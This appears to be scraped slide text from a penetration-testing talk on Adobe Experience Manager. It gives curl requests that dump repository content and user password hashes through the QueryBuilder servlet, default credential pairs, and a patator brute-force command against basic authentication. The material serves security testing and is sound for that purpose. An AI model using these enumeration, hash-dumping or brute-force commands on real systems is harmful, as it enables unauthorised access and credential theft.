Professional Documents
Culture Documents
Adobe Experience
Manager sites
Related Work
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/securitychecklist.html
What do we want
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification
-X GET http://127.0.0.1:8080/.json
curl
-X GET http://127.0.0.1:8080/.6.json
curl
-X GET http://127.0.0.1:8080/.tidy.6.json
curl
-X GET http://127.0.0.1:8080/.tidy.infinity.json
-X GET http://127.0.0.1:8080/bin.tidy.infinity.json
curl
-X GET http://127.0.0.1:8080/bin/querybuilder.json
Custom scripts
List customs scripts
curl
-X GET http://127.0.0.1:8080/apps.tidy.infinity.json
-X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json
Usernames
Dump content node properties
curl
-X GET http://127.0.0.1:8080/content.infinity.json
Password hashes
Use QueryBuilder bundle
curl -X GET
http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel
ective&p.properties=rep:principalName%20rep:password&p.limit=100
Anonymous modification
Dump content node properties
curl
-X GET http://127.0.0.1:8080/content.infinity.json
Getting access
Try default user credentials: admin/admin, author/author,
anonymous/anonymous
Offline attack (brute hashes)
Online attack (POST servlet bundle)
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json
method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt
auth_type=basic -x ignore:code!=200 --threads 5
Inbound exploitation
Pros: you do not need external server, more stable
Cons: you need credentials of the user that is able to modify some node in JCR
http://www.youtube.com/watch?v=Hg3AXoG89Gs
http://www.youtube.com/watch?v=Z9n2T07e6Ls
Ask a Ninja